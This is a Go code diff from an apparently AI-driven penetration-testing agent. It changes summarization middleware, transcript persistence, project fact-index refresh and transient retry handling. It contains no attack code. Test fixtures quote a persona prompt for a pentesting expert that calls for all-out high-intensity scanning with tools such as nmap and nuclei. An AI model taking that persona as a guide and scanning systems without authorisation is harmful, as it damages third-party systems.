mainToolsForCfg, mainOrchestratorPre, singleToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, logger) mainToolsForCfg, mainOrchestratorPre, singleToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, projectID, logger)
if err != nil { if err != nil {
return nil, fmt.Errorf("eino single eino 中间件: %w", err) return nil, fmt.Errorf("eino single eino 中间件: %w", err)
} }
@@ -132,7 +123,7 @@ func RunEinoSingleChatModelAgent(
return nil, fmt.Errorf("eino single 模型: %w", err) return nil, fmt.Errorf("eino single 模型: %w", err)
} }
mainSumMw, err := newEinoSummarizationMiddleware(ctx, mainModel, appCfg, &ma.EinoMiddleware, conversationID, logger) mainSumMw, err := newEinoSummarizationMiddleware(ctx, mainModel, appCfg, &ma.EinoMiddleware, conversationID, db, projectID, logger)
if err != nil { if err != nil {
return nil, fmt.Errorf("eino single summarization: %w", err) return nil, fmt.Errorf("eino single summarization: %w", err)
} }
@@ -145,7 +136,7 @@ func RunEinoSingleChatModelAgent(
} }
if einoSkillMW != nil { if einoSkillMW != nil {
if einoFSTools && einoLoc != nil { if einoFSTools && einoLoc != nil {
fsMw, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, einoSingleAgentName, einoExecMonitor, agentToolTimeoutMinutes(appCfg), toolOutputChunk) fsMw, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, einoSingleAgentName, einoExecMonitor, agentToolTimeoutMinutes(appCfg), nil)
if fsErr != nil { if fsErr != nil {
return nil, fmt.Errorf("eino single filesystem 中间件: %w", fsErr) return nil, fmt.Errorf("eino single filesystem 中间件: %w", fsErr)
} }
@@ -153,13 +144,14 @@ func RunEinoSingleChatModelAgent(
} }
handlers = append(handlers, einoSkillMW) handlers = append(handlers, einoSkillMW)
} }
handlers = append(handlers, mainSumMw) handlers = appendEinoChatModelTailMiddlewares(handlers, einoChatModelTailConfig{
if teleMw := newEinoModelInputTelemetryMiddleware(logger, appCfg.OpenAI.Model, conversationID, "eino_single"); teleMw != nil { logger: logger,
handlers = append(handlers, teleMw) phase: "eino_single",
} summarization: mainSumMw,
if capMw := newModelFacingTraceMiddleware(modelFacingTrace); capMw != nil { modelName: appCfg.OpenAI.Model,
handlers = append(handlers, capMw) conversationID: conversationID,
} trace: modelFacingTrace,
})
maxIter := agentMaxIterations(appCfg) maxIter := agentMaxIterations(appCfg)
@@ -197,13 +189,10 @@ func RunEinoSingleChatModelAgent(
MaxIterations: maxIter, MaxIterations: maxIter,
Handlers: handlers, Handlers: handlers,
} }
outKey, modelRetry, _ := deepExtrasFromConfig(ma) outKey, _ := deepExtrasFromConfig(ma)
if outKey != "" { if outKey != "" {
chatCfg.OutputKey = outKey chatCfg.OutputKey = outKey
} }
if modelRetry != nil {
chatCfg.ModelRetryConfig = modelRetry
}
chatAgent, err := adk.NewChatModelAgent(ctx, chatCfg) chatAgent, err := adk.NewChatModelAgent(ctx, chatCfg)
if err != nil { if err != nil {
@@ -237,6 +226,7 @@ func RunEinoSingleChatModelAgent(
McpIDs: &mcpIDs, McpIDs: &mcpIDs,
FilesystemMonitorAgent: ag, FilesystemMonitorAgent: ag,
FilesystemMonitorRecord: recorder, FilesystemMonitorRecord: recorder,
MCPExecutionBinder: mcpExecBinder,
ToolInvokeNotify: toolInvokeNotify, ToolInvokeNotify: toolInvokeNotify,
DA: chatAgent, DA: chatAgent,
ModelFacingTrace: modelFacingTrace, ModelFacingTrace: modelFacingTrace,
+1 -1
View File
@@ -81,7 +81,7 @@ func subAgentFilesystemMiddleware(
loc *localbk.Local, loc *localbk.Local,
invokeNotify *einomcp.ToolInvokeNotifyHolder, invokeNotify *einomcp.ToolInvokeNotifyHolder,
einoAgentName string, einoAgentName string,
recordMonitor func(command, stdout string, success bool, invokeErr error), recordMonitor func(toolCallID, command, stdout string, success bool, invokeErr error),
toolTimeoutMinutes int, toolTimeoutMinutes int,
outputChunk func(toolName, toolCallID, chunk string), outputChunk func(toolName, toolCallID, chunk string),
) (adk.ChatModelAgentMiddleware, error) { ) (adk.ChatModelAgentMiddleware, error) {
+107 -29
View File
@@ -9,7 +9,9 @@ import (
"cyberstrike-ai/internal/agent" "cyberstrike-ai/internal/agent"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
copenai "cyberstrike-ai/internal/openai" copenai "cyberstrike-ai/internal/openai"
"cyberstrike-ai/internal/project"
"github.com/bytedance/sonic" "github.com/bytedance/sonic"
"github.com/cloudwego/eino/adk" "github.com/cloudwego/eino/adk"
@@ -20,8 +22,6 @@ import (
"go.uber.org/zap" "go.uber.org/zap"
) )
const defaultSummarizationRetryMax = 3
// einoSummarizeUserInstruction:压缩历史时保留渗透测试关键信息。 // einoSummarizeUserInstruction:压缩历史时保留渗透测试关键信息。
const einoSummarizeUserInstruction = `在保持所有关键安全测试信息完整的前提下压缩对话历史 const einoSummarizeUserInstruction = `在保持所有关键安全测试信息完整的前提下压缩对话历史
@@ -40,6 +40,8 @@ func newEinoSummarizationMiddleware(
appCfg *config.Config, appCfg *config.Config,
mwCfg *config.MultiAgentEinoMiddlewareConfig, mwCfg *config.MultiAgentEinoMiddlewareConfig,
conversationID string, conversationID string,
db *database.DB,
projectID string,
logger *zap.Logger, logger *zap.Logger,
) (adk.ChatModelAgentMiddleware, error) { ) (adk.ChatModelAgentMiddleware, error) {
if summaryModel == nil || appCfg == nil { if summaryModel == nil || appCfg == nil {
@@ -93,10 +95,8 @@ func newEinoSummarizationMiddleware(
} }
} }
retryMax := defaultSummarizationRetryMax retryPolicy := einoTransientRunRetryPolicyFromMW(mwCfg)
if mwCfg != nil && mwCfg.SummarizationRetryMaxAttempts > 0 { retryMax := retryPolicy.maxAttempts
retryMax = mwCfg.SummarizationRetryMaxAttempts
}
// ModelOptions apply only to summarization Generate (same ChatModel instance as the agent). // ModelOptions apply only to summarization Generate (same ChatModel instance as the agent).
// Strip thinking/reasoning on this call path; mark requests for empty-choices diagnostics. // Strip thinking/reasoning on this call path; mark requests for empty-choices diagnostics.
@@ -133,33 +133,48 @@ func newEinoSummarizationMiddleware(
Retry: &summarization.RetryConfig{ Retry: &summarization.RetryConfig{
MaxRetries: &retryMax, MaxRetries: &retryMax,
ShouldRetry: func(_ context.Context, _ adk.Message, err error) bool { ShouldRetry: func(_ context.Context, _ adk.Message, err error) bool {
if err != nil && logger != nil { retry := isEinoTransientRunError(err)
logger.Warn("eino summarization generate attempt failed, will retry if attempts remain", if retry && logger != nil {
logger.Warn("eino summarization generate transient error, will retry if attempts remain",
zap.Error(err), zap.Error(err),
zap.Int("max_retries", retryMax), zap.Int("max_retries", retryMax),
) )
} }
return err != nil return retry
}, },
}, },
Finalize: func(ctx context.Context, originalMessages []adk.Message, summary adk.Message) ([]adk.Message, error) { Finalize: func(ctx context.Context, originalMessages []adk.Message, summary adk.Message) ([]adk.Message, error) {
return summarizeFinalizeWithRecentAssistantToolTrail(ctx, originalMessages, summary, tokenCounter, recentTrailMax) out, ferr := summarizeFinalizeWithRecentAssistantToolTrail(ctx, originalMessages, summary, tokenCounter, recentTrailMax)
if ferr != nil {
return nil, ferr
}
if appCfg != nil {
out = refreshFactIndexInMessages(out, db, projectID, appCfg.Project, logger)
}
return out, nil
}, },
Callback: func(ctx context.Context, before, after adk.ChatModelAgentState) error { Callback: func(ctx context.Context, before, after adk.ChatModelAgentState) error {
if logger == nil { if transcriptPath != "" && len(before.Messages) > 0 {
return nil if werr := writeSummarizationTranscript(transcriptPath, before.Messages); werr != nil && logger != nil {
logger.Warn("eino summarization transcript 写入失败",
zap.String("path", transcriptPath),
zap.Error(werr),
)
}
}
if logger != nil {
beforeTokens, _ := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: before.Messages})
afterTokens, _ := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: after.Messages})
logger.Info("eino summarization 已压缩上下文",
zap.Int("messages_before", len(before.Messages)),
zap.Int("messages_after", len(after.Messages)),
zap.Int("tokens_before_estimated", beforeTokens),
zap.Int("tokens_after_estimated", afterTokens),
zap.Int("max_total_tokens", maxTotal),
zap.Int("trigger_context_tokens", trigger),
zap.String("transcript_file", transcriptPath),
)
} }
beforeTokens, _ := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: before.Messages})
afterTokens, _ := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: after.Messages})
logger.Info("eino summarization 已压缩上下文",
zap.Int("messages_before", len(before.Messages)),
zap.Int("messages_after", len(after.Messages)),
zap.Int("tokens_before_estimated", beforeTokens),
zap.Int("tokens_after_estimated", afterTokens),
zap.Int("max_total_tokens", maxTotal),
zap.Int("trigger_context_tokens", trigger),
zap.String("transcript_file", transcriptPath),
)
return nil return nil
}, },
}) })
@@ -169,6 +184,50 @@ func newEinoSummarizationMiddleware(
return mw, nil return mw, nil
} }
// refreshFactIndexInMessages 在 summarization 压缩后,用 DB 最新索引替换 system 中已有的项目黑板索引段。
func refreshFactIndexInMessages(msgs []adk.Message, db *database.DB, projectID string, cfg config.ProjectConfig, logger *zap.Logger) []adk.Message {
if db == nil || !cfg.Enabled {
return msgs
}
projectID = strings.TrimSpace(projectID)
if projectID == "" {
return msgs
}
freshIndex, err := project.BuildFactIndexBlock(db, projectID, cfg)
if err != nil {
if logger != nil {
logger.Warn("summarization: 刷新项目黑板索引失败", zap.String("projectId", projectID), zap.Error(err))
}
return msgs
}
freshIndex = strings.TrimSpace(freshIndex)
if freshIndex == "" {
return msgs
}
changed := false
out := make([]adk.Message, len(msgs))
for i, msg := range msgs {
if msg == nil || msg.Role != schema.System {
out[i] = msg
continue
}
newContent, ok := project.ReplaceFactIndexSection(msg.Content, freshIndex)
if !ok {
out[i] = msg
continue
}
cloned := *msg
cloned.Content = newContent
out[i] = &cloned
changed = true
}
if changed && logger != nil {
logger.Info("summarization: 已刷新项目黑板索引", zap.String("projectId", projectID))
}
return out
}
// summarizeFinalizeWithRecentAssistantToolTrail 在摘要消息后保留最近 assistant/tool 轨迹,避免压缩后执行链断裂。 // summarizeFinalizeWithRecentAssistantToolTrail 在摘要消息后保留最近 assistant/tool 轨迹,避免压缩后执行链断裂。
// //
// 关键不变量:tool_call ↔ tool_result 的 pair 必须整体保留或整体丢弃。 // 关键不变量:tool_call ↔ tool_result 的 pair 必须整体保留或整体丢弃。
@@ -198,17 +257,19 @@ func summarizeFinalizeWithRecentAssistantToolTrail(
nonSystem = append(nonSystem, msg) nonSystem = append(nonSystem, msg)
} }
mergedSystem := mergeCollectedSystemMessages(systemMsgs)
if recentTrailTokenBudget <= 0 || len(nonSystem) == 0 { if recentTrailTokenBudget <= 0 || len(nonSystem) == 0 {
out := make([]adk.Message, 0, len(systemMsgs)+1) out := make([]adk.Message, 0, len(mergedSystem)+1)
out = append(out, systemMsgs...) out = append(out, mergedSystem...)
out = append(out, summary) out = append(out, summary)
return out, nil return out, nil
} }
rounds := splitMessagesIntoRounds(nonSystem) rounds := splitMessagesIntoRounds(nonSystem)
if len(rounds) == 0 { if len(rounds) == 0 {
out := make([]adk.Message, 0, len(systemMsgs)+1) out := make([]adk.Message, 0, len(mergedSystem)+1)
out = append(out, systemMsgs...) out = append(out, mergedSystem...)
out = append(out, summary) out = append(out, summary)
return out, nil return out, nil
} }
@@ -260,8 +321,8 @@ func summarizeFinalizeWithRecentAssistantToolTrail(
selectedMsgs = append(selectedMsgs, selectedRoundsReverse[i].messages...) selectedMsgs = append(selectedMsgs, selectedRoundsReverse[i].messages...)
} }
out := make([]adk.Message, 0, len(systemMsgs)+1+len(selectedMsgs)) out := make([]adk.Message, 0, len(mergedSystem)+1+len(selectedMsgs))
out = append(out, systemMsgs...) out = append(out, mergedSystem...)
out = append(out, summary) out = append(out, summary)
out = append(out, selectedMsgs...) out = append(out, selectedMsgs...)
return out, nil return out, nil
@@ -335,6 +396,23 @@ func splitMessagesIntoRounds(msgs []adk.Message) []messageRound {
return rounds return rounds
} }
// writeSummarizationTranscript persists pre-compaction history for read_file after summarization.
// Eino TranscriptFilePath only embeds the path in summary text; the file must be written by the host app.
func writeSummarizationTranscript(path string, msgs []adk.Message) error {
path = strings.TrimSpace(path)
if path == "" {
return nil
}
body := formatSummarizationTranscript(msgs)
if err := os.MkdirAll(filepath.Dir(path), 0o755); err != nil {
return fmt.Errorf("mkdir transcript dir: %w", err)
}
if err := os.WriteFile(path, []byte(body), 0o600); err != nil {
return fmt.Errorf("write transcript: %w", err)
}
return nil
}
func einoSummarizationTokenCounter(openAIModel string) summarization.TokenCounterFunc { func einoSummarizationTokenCounter(openAIModel string) summarization.TokenCounterFunc {
tc := agent.NewTikTokenCounter() tc := agent.NewTikTokenCounter()
return func(ctx context.Context, input *summarization.TokenCounterInput) (int, error) { return func(ctx context.Context, input *summarization.TokenCounterInput) (int, error) {
+161 -6
View File
@@ -2,11 +2,19 @@ package multiagent
import ( import (
"context" "context"
"os"
"path/filepath"
"strings"
"testing" "testing"
"cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/project"
"github.com/cloudwego/eino/adk" "github.com/cloudwego/eino/adk"
"github.com/cloudwego/eino/adk/middlewares/summarization" "github.com/cloudwego/eino/adk/middlewares/summarization"
"github.com/cloudwego/eino/schema" "github.com/cloudwego/eino/schema"
"go.uber.org/zap"
) )
// fixedTokenCounter 让 tool 消息按 tokensPerToolMessage 计,其它消息按 1 计。 // fixedTokenCounter 让 tool 消息按 tokensPerToolMessage 计,其它消息按 1 计。
@@ -184,8 +192,8 @@ func TestSummarizeFinalize_KeepsToolRoundIntact(t *testing.T) {
if len(out) < 2 { if len(out) < 2 {
t.Fatalf("output too short: %d", len(out)) t.Fatalf("output too short: %d", len(out))
} }
if out[0] != sys { if out[0].Role != schema.System || out[0].Content != "sys" {
t.Fatalf("first message must be system") t.Fatalf("first message must be system sys, got %s: %q", out[0].Role, out[0].Content)
} }
if out[1] != summary { if out[1] != summary {
t.Fatalf("second message must be summary") t.Fatalf("second message must be summary")
@@ -285,12 +293,12 @@ func TestSummarizeFinalize_BudgetZeroFallsBackToSummaryOnly(t *testing.T) {
if err != nil { if err != nil {
t.Fatalf("unexpected error: %v", err) t.Fatalf("unexpected error: %v", err)
} }
if len(out) != 2 || out[0] != sys || out[1] != summary { if len(out) != 2 || out[0].Role != schema.System || out[0].Content != "sys" || out[1] != summary {
t.Fatalf("budget=0 must yield [system, summary] only, got %+v", out) t.Fatalf("budget=0 must yield [system, summary] only, got %+v", out)
} }
} }
func TestSummarizeFinalize_PreservesAllSystemMessages(t *testing.T) { func TestSummarizeFinalize_MergesSystemMessages(t *testing.T) {
sys1 := schema.SystemMessage("sys1") sys1 := schema.SystemMessage("sys1")
sys2 := schema.SystemMessage("sys2") sys2 := schema.SystemMessage("sys2")
summary := schema.AssistantMessage("s", nil) summary := schema.AssistantMessage("s", nil)
@@ -313,10 +321,13 @@ func TestSummarizeFinalize_PreservesAllSystemMessages(t *testing.T) {
for _, m := range out { for _, m := range out {
if m != nil && m.Role == schema.System { if m != nil && m.Role == schema.System {
systemCount++ systemCount++
if got := m.Content; got != "sys1\n\nsys2" {
t.Fatalf("unexpected merged system content: %q", got)
}
} }
} }
if systemCount != 2 { if systemCount != 1 {
t.Fatalf("want 2 system messages retained, got %d", systemCount) t.Fatalf("want 1 merged system message, got %d", systemCount)
} }
} }
@@ -343,3 +354,147 @@ func assertNoOrphanTool(t *testing.T, msgs []adk.Message) {
} }
} }
} }
func TestWriteSummarizationTranscript(t *testing.T) {
t.Parallel()
dir := t.TempDir()
path := filepath.Join(dir, "summarization", "transcript.txt")
msgs := []adk.Message{
schema.UserMessage("scan target"),
assistantToolCallsMsg("", "tc1"),
schema.ToolMessage("nmap output", "tc1"),
}
if err := writeSummarizationTranscript(path, msgs); err != nil {
t.Fatalf("writeSummarizationTranscript: %v", err)
}
body, err := os.ReadFile(path)
if err != nil {
t.Fatalf("read transcript: %v", err)
}
text := string(body)
if !strings.Contains(text, "Pre-compaction session record") {
t.Fatalf("missing transcript header: %q", text)
}
if !strings.Contains(text, "[user]") || !strings.Contains(text, "scan target") {
t.Fatalf("missing user section: %q", text)
}
if !strings.Contains(text, "tool_calls:") || !strings.Contains(text, "nmap output") {
t.Fatalf("missing tool round: %q", text)
}
if !strings.Contains(text, `"name":"stub_tool"`) || !strings.Contains(text, `"arguments":"{}"`) {
t.Fatalf("missing tool name/arguments: %q", text)
}
if strings.Contains(text, "tool_call_id") || strings.Contains(text, `"id":"tc1"`) {
t.Fatalf("transcript should omit tool_call_id: %q", text)
}
}
func TestSanitizeSystemContentForTranscript_BestPractice(t *testing.T) {
t.Parallel()
system := strings.Join([]string{
"以下是当前会话绑定的工具名称索引(仅名称,无参数 JSON Schema)。",
"- nmap",
"- nuclei",
"",
"使用规则:",
"1) 上表仅为名称索引",
"5) 不要臆造不存在的工具名。",
"",
"你是CyberStrikeAI,是一个专业的网络安全渗透测试专家。",
"高强度扫描要求:全力出击",
"",
project.FactIndexSectionStartMarker,
"## 项目黑板索引(project: 123, id: abc",
"(暂无事实)",
"需要写入请使用 upsert_project_fact。",
project.FactIndexSectionEndMarker,
"",
"# Skills System",
"**How to Use Skills**",
"Remember: Skills make you more capable",
}, "\n")
out := sanitizeSystemContentForTranscript(system)
if strings.Contains(out, "以下是当前会话绑定的工具名称索引") {
t.Fatalf("tool index should be stripped: %q", out)
}
if strings.Contains(out, "- nmap") || strings.Contains(out, "高强度扫描要求") {
t.Fatalf("static persona should be stripped: %q", out)
}
if strings.Contains(out, "# Skills System") || strings.Contains(out, "How to Use Skills") {
t.Fatalf("skills boilerplate should be stripped: %q", out)
}
if !strings.Contains(out, transcriptStaticSystemOmitNote) {
t.Fatalf("missing omission note: %q", out)
}
if !strings.Contains(out, "## 项目黑板索引(project: 123, id: abc") {
t.Fatalf("project blackboard should be kept: %q", out)
}
}
func TestFormatSummarizationTranscript_OmitsBloatedSystem(t *testing.T) {
t.Parallel()
msgs := []adk.Message{
schema.SystemMessage("以下是当前会话绑定的工具名称索引\n- nmap\n\n你是CyberStrikeAI\n" + project.FactIndexSectionStartMarker + "\n## 项目黑板索引(project: p1, id: x\n(暂无事实)\n" + project.FactIndexSectionEndMarker + "\n# Skills System\nboiler"),
schema.UserMessage("hello"),
schema.AssistantMessage("reply", nil),
}
out := formatSummarizationTranscript(msgs)
if strings.Contains(out, "- nmap") {
t.Fatalf("tool list leaked into transcript: %q", out)
}
if !strings.Contains(out, "hello") || !strings.Contains(out, "reply") {
t.Fatalf("conversation turns missing: %q", out)
}
if !strings.Contains(out, "## 项目黑板索引(project: p1, id: x") {
t.Fatalf("dynamic blackboard missing: %q", out)
}
}
func TestRefreshFactIndexInMessages(t *testing.T) {
t.Parallel()
dbPath := filepath.Join(t.TempDir(), "summarize-facts.db")
db, err := database.NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatal(err)
}
defer db.Close()
proj, err := db.CreateProject(&database.Project{Name: "summarize-proj"})
if err != nil {
t.Fatal(err)
}
cfg := config.ProjectConfig{Enabled: true}
oldIndex, err := project.BuildFactIndexBlock(db, proj.ID, cfg)
if err != nil {
t.Fatal(err)
}
_, err = db.UpsertProjectFact(&database.ProjectFact{
ProjectID: proj.ID,
FactKey: "target/host",
Category: "target",
Summary: "fresh host fact",
})
if err != nil {
t.Fatal(err)
}
msgs := []adk.Message{
schema.SystemMessage("instruction\n\n" + oldIndex),
schema.UserMessage("hi"),
}
out := refreshFactIndexInMessages(msgs, db, proj.ID, cfg, nil)
sys := out[0].Content
if strings.Contains(sys, "(暂无事实)") {
t.Fatalf("expected refreshed index, got: %q", sys)
}
if !strings.Contains(sys, "fresh host fact") {
t.Fatalf("expected new fact in index: %q", sys)
}
if !strings.Contains(sys, "instruction") {
t.Fatalf("non-index system content should be preserved: %q", sys)
}
}
@@ -0,0 +1,163 @@
package multiagent
import (
"strings"
"github.com/cloudwego/eino/adk"
"github.com/cloudwego/eino/schema"
"cyberstrike-ai/internal/project"
"github.com/bytedance/sonic"
)
const (
transcriptFileHeader = `# CyberStrikeAI summarization transcript
# Pre-compaction session record for read_file after context compression.
# Omits static system/tool-index/skills boilerplate; full user/assistant/tool turns below.
`
transcriptStaticSystemOmitNote = "[static system prompt omitted — unchanged in live context after compaction]"
transcriptToolIndexStartMarker = "以下是当前会话绑定的工具名称索引"
transcriptPersonaStartMarker = "你是CyberStrikeAI"
transcriptSkillsSystemMarker = "# Skills System"
)
type transcriptToolCall struct {
Name string `json:"name"`
Arguments string `json:"arguments"`
}
// formatSummarizationTranscript renders pre-compaction messages for transcript.txt.
// Best practice: keep full user/assistant/tool turns; slim system to dynamic blocks only.
func formatSummarizationTranscript(msgs []adk.Message) string {
var sb strings.Builder
sb.WriteString(transcriptFileHeader)
wrote := false
for _, msg := range msgs {
if msg == nil {
continue
}
switch msg.Role {
case schema.System:
body := sanitizeSystemContentForTranscript(msg.Content)
if strings.TrimSpace(body) == "" {
continue
}
if wrote {
sb.WriteString("\n")
}
appendTranscriptSection(&sb, schema.System, body)
wrote = true
default:
if wrote {
sb.WriteString("\n")
}
appendTranscriptMessage(&sb, msg)
wrote = true
}
}
return sb.String()
}
func sanitizeSystemContentForTranscript(content string) string {
content = stripToolNamesIndexFromSystem(content)
content = stripSkillsSystemBoilerplate(content)
blackboard := extractProjectBlackboardSection(content)
var sb strings.Builder
sb.WriteString(transcriptStaticSystemOmitNote)
if bb := strings.TrimSpace(blackboard); bb != "" {
sb.WriteString("\n\n")
sb.WriteString(bb)
}
return sb.String()
}
func stripToolNamesIndexFromSystem(s string) string {
if !strings.Contains(s, transcriptToolIndexStartMarker) {
return s
}
idx := strings.Index(s, transcriptPersonaStartMarker)
if idx < 0 {
return s
}
return strings.TrimSpace(s[idx:])
}
func stripSkillsSystemBoilerplate(s string) string {
idx := strings.Index(s, transcriptSkillsSystemMarker)
if idx < 0 {
return strings.TrimSpace(s)
}
return strings.TrimSpace(s[:idx])
}
func extractProjectBlackboardSection(s string) string {
start := strings.Index(s, project.FactIndexSectionStartMarker)
if start < 0 {
return ""
}
section := s[start:]
end := strings.Index(section, project.FactIndexSectionEndMarker)
if end < 0 {
return ""
}
section = section[:end+len(project.FactIndexSectionEndMarker)]
return strings.TrimSpace(section)
}
func appendTranscriptSection(sb *strings.Builder, role schema.RoleType, body string) {
sb.WriteString("--- [")
sb.WriteString(string(role))
sb.WriteString("] ---\n")
sb.WriteString(body)
if !strings.HasSuffix(body, "\n") {
sb.WriteByte('\n')
}
}
func appendTranscriptMessage(sb *strings.Builder, msg adk.Message) {
sb.WriteString("--- [")
sb.WriteString(string(msg.Role))
sb.WriteString("] ---\n")
if msg.Content != "" {
sb.WriteString(msg.Content)
if !strings.HasSuffix(msg.Content, "\n") {
sb.WriteByte('\n')
}
}
if msg.ReasoningContent != "" {
sb.WriteString("[reasoning]\n")
sb.WriteString(msg.ReasoningContent)
if !strings.HasSuffix(msg.ReasoningContent, "\n") {
sb.WriteByte('\n')
}
}
for _, part := range msg.UserInputMultiContent {
if part.Type == schema.ChatMessagePartTypeText && strings.TrimSpace(part.Text) != "" {
sb.WriteString(part.Text)
if !strings.HasSuffix(part.Text, "\n") {
sb.WriteByte('\n')
}
}
}
if len(msg.ToolCalls) > 0 {
if b, err := sonic.Marshal(formatTranscriptToolCalls(msg.ToolCalls)); err == nil {
sb.WriteString("tool_calls: ")
sb.Write(b)
sb.WriteByte('\n')
}
}
}
func formatTranscriptToolCalls(calls []schema.ToolCall) []transcriptToolCall {
out := make([]transcriptToolCall, 0, len(calls))
for _, tc := range calls {
out = append(out, transcriptToolCall{
Name: tc.Function.Name,
Arguments: tc.Function.Arguments,
})
}
return out
}
+74 -14
View File
@@ -3,6 +3,7 @@ package multiagent
import ( import (
"context" "context"
"errors" "errors"
"fmt"
"strings" "strings"
"time" "time"
@@ -17,8 +18,9 @@ const (
defaultEinoRunRetryMaxBackoff = 30 * time.Second defaultEinoRunRetryMaxBackoff = 30 * time.Second
) )
// isEinoTransientRunError 判断 ADK 运行期错误是否适合指数退避续跑(429、5xx、网络抖动等) // isEinoTransientRunError 是 Eino 运行期「可退避重试 vs 直接失败」的唯一判据
// 用户取消、超时、迭代上限等由 run loop 单独处理,不在此列 // 429/5xx/网络抖动等返回 true;用户取消、超时、迭代上限、鉴权失败等返回 false
// 其它模块(run loop、summarization 等)只调用本函数,不在别处维护平行规则。
func isEinoTransientRunError(err error) bool { func isEinoTransientRunError(err error) bool {
if err == nil { if err == nil {
return false return false
@@ -60,6 +62,7 @@ func isEinoTransientRunError(err error) bool {
"dial tcp", "dial tcp",
"tls handshake timeout", "tls handshake timeout",
"stream error", "stream error",
"goaway", // http2: server sent GOAWAY and closed the connection
"unexpected eof", "unexpected eof",
`": eof`, // net/http: Post "url": EOF (often wraps io.EOF) `": eof`, // net/http: Post "url": EOF (often wraps io.EOF)
"unexpected end of json", "unexpected end of json",
@@ -78,6 +81,71 @@ func isEinoTransientRunError(err error) bool {
return false return false
} }
type einoTransientRunRetryPolicy struct {
maxAttempts int
maxBackoff time.Duration
}
func einoTransientRunRetryPolicyFromArgs(args *einoADKRunLoopArgs) einoTransientRunRetryPolicy {
return einoTransientRunRetryPolicy{
maxAttempts: einoRunRetryMaxAttempts(args),
maxBackoff: einoRunRetryMaxBackoff(args),
}
}
func einoTransientRunRetryPolicyFromMW(mw *config.MultiAgentEinoMiddlewareConfig) einoTransientRunRetryPolicy {
maxBackoff := defaultEinoRunRetryMaxBackoff
if mw != nil && mw.RunRetryMaxBackoffSec > 0 {
maxBackoff = time.Duration(mw.RunRetryMaxBackoffSec) * time.Second
}
return einoTransientRunRetryPolicy{
maxAttempts: RunRetryMaxAttemptsFromConfig(mw),
maxBackoff: maxBackoff,
}
}
// einoTransientRunRetrier 在 run loop 内对临时错误做指数退避并重启 Runner(唯一重试执行层)。
type einoTransientRunRetrier struct {
policy einoTransientRunRetryPolicy
attempts int
}
func newEinoTransientRunRetrier(policy einoTransientRunRetryPolicy) *einoTransientRunRetrier {
return &einoTransientRunRetrier{policy: policy}
}
// tryRetry 对临时错误退避后返回重启消息;次数用尽返回 exhausted 错误。
func (r *einoTransientRunRetrier) tryRetry(
ctx context.Context,
runErr error,
args *einoADKRunLoopArgs,
baseMsgs, accumulated []adk.Message,
baseCount int,
) (restarted bool, restartMsgs []adk.Message, ctxSource einoRunRestartContextSource, backoff time.Duration, fatal error) {
if runErr == nil || !isEinoTransientRunError(runErr) {
return false, nil, "", 0, runErr
}
r.attempts++
if r.attempts > r.policy.maxAttempts {
return false, nil, "", 0, fmt.Errorf("transient retry exhausted after %d attempts: %w", r.policy.maxAttempts, runErr)
}
backoff = einoTransientRetryBackoff(r.attempts-1, r.policy.maxBackoff)
select {
case <-ctx.Done():
return false, nil, "", 0, ctx.Err()
case <-time.After(backoff):
}
restartMsgs, ctxSource = einoMessagesForRunRestart(args, baseMsgs, accumulated, baseCount)
return true, restartMsgs, ctxSource, backoff, nil
}
func (r *einoTransientRunRetrier) attempt() int { return r.attempts }
func (r *einoTransientRunRetrier) maxAttempts() int { return r.policy.maxAttempts }
// reset 在一次成功推进后清零重试计数,使后续临时错误从第 1 次退避重新开始。
func (r *einoTransientRunRetrier) reset() { r.attempts = 0 }
func einoRunRetryMaxAttempts(args *einoADKRunLoopArgs) int { func einoRunRetryMaxAttempts(args *einoADKRunLoopArgs) int {
if args != nil && args.RunRetryMaxAttempts > 0 { if args != nil && args.RunRetryMaxAttempts > 0 {
return args.RunRetryMaxAttempts return args.RunRetryMaxAttempts
@@ -85,7 +153,7 @@ func einoRunRetryMaxAttempts(args *einoADKRunLoopArgs) int {
return defaultEinoRunRetryMaxAttempts return defaultEinoRunRetryMaxAttempts
} }
// RunRetryMaxAttemptsFromConfig 供 handler 分段续跑计数(与 eino_middleware.run_retry_max_attempts 一致 // RunRetryMaxAttemptsFromConfig 与 eino_middleware.run_retry_max_attempts 一致。
func RunRetryMaxAttemptsFromConfig(mw *config.MultiAgentEinoMiddlewareConfig) int { func RunRetryMaxAttemptsFromConfig(mw *config.MultiAgentEinoMiddlewareConfig) int {
if mw != nil && mw.RunRetryMaxAttempts > 0 { if mw != nil && mw.RunRetryMaxAttempts > 0 {
return mw.RunRetryMaxAttempts return mw.RunRetryMaxAttempts
@@ -93,15 +161,6 @@ func RunRetryMaxAttemptsFromConfig(mw *config.MultiAgentEinoMiddlewareConfig) in
return defaultEinoRunRetryMaxAttempts return defaultEinoRunRetryMaxAttempts
} }
// TransientRetryBackoff 供 handler 在分段续跑前退避。
func TransientRetryBackoff(attempt int, maxBackoffSec int) time.Duration {
max := defaultEinoRunRetryMaxBackoff
if maxBackoffSec > 0 {
max = time.Duration(maxBackoffSec) * time.Second
}
return einoTransientRetryBackoff(attempt, max)
}
func einoRunRetryMaxBackoff(args *einoADKRunLoopArgs) time.Duration { func einoRunRetryMaxBackoff(args *einoADKRunLoopArgs) time.Duration {
if args != nil && args.RunRetryMaxBackoffSec > 0 { if args != nil && args.RunRetryMaxBackoffSec > 0 {
return time.Duration(args.RunRetryMaxBackoffSec) * time.Second return time.Duration(args.RunRetryMaxBackoffSec) * time.Second
@@ -122,10 +181,11 @@ const (
// 1) ModelFacingTrace(与模型实际入参一致) 2) 事件流累积的 runAccumulatedMsgs 3) 初始 msgs。 // 1) ModelFacingTrace(与模型实际入参一致) 2) 事件流累积的 runAccumulatedMsgs 3) 初始 msgs。
